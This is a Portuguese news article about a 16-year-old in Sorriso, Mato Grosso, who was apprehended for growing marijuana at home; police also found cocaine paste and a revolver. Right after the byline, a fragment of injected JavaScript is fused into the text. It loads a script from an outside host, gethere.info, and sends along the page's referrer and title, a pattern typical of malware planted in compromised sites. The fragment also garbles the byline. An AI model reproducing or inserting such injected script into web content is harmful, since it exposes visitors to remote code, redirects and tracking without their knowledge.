Capa / Em Destaque / Adolescente é apreendido por cultivar maconha em casa

Adolescente é apreendido por cultivar maconha em casa

Em Sorriso, policiais do 12° Batalhão de Polícia Militar (3º Comando Regional) apreenderam na noite de sábado (14.05), um menor que cultivava maconha no quintal de casa. Morador do Jardim Bela Vista, o adolescente de 16 anos, tinha oito pés da droga divididos em cinco recipientes, sendo três vasos e dois em utensílios domésticos improvisados.
Além da plantação de erva entorpecente de cultivo e uso proibidos, a guarnição policial encontrou uma porção de pasta-base de cocaína e uma arma, um revólver calibre 38, cuja origem o adolescente não soube explicar.
A existência dos pés de maconha e da arma chegou ao conhecimento da Polícia Militar por telefone, através de ligação anônima. O menor e os produtos aprendidos com ele foram entregues na Delegacia de Polícia. Em todo estado, a PMMT recebe denúncias pelo telefone:O800653939.

Alecy Alves/Polícia Militars.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top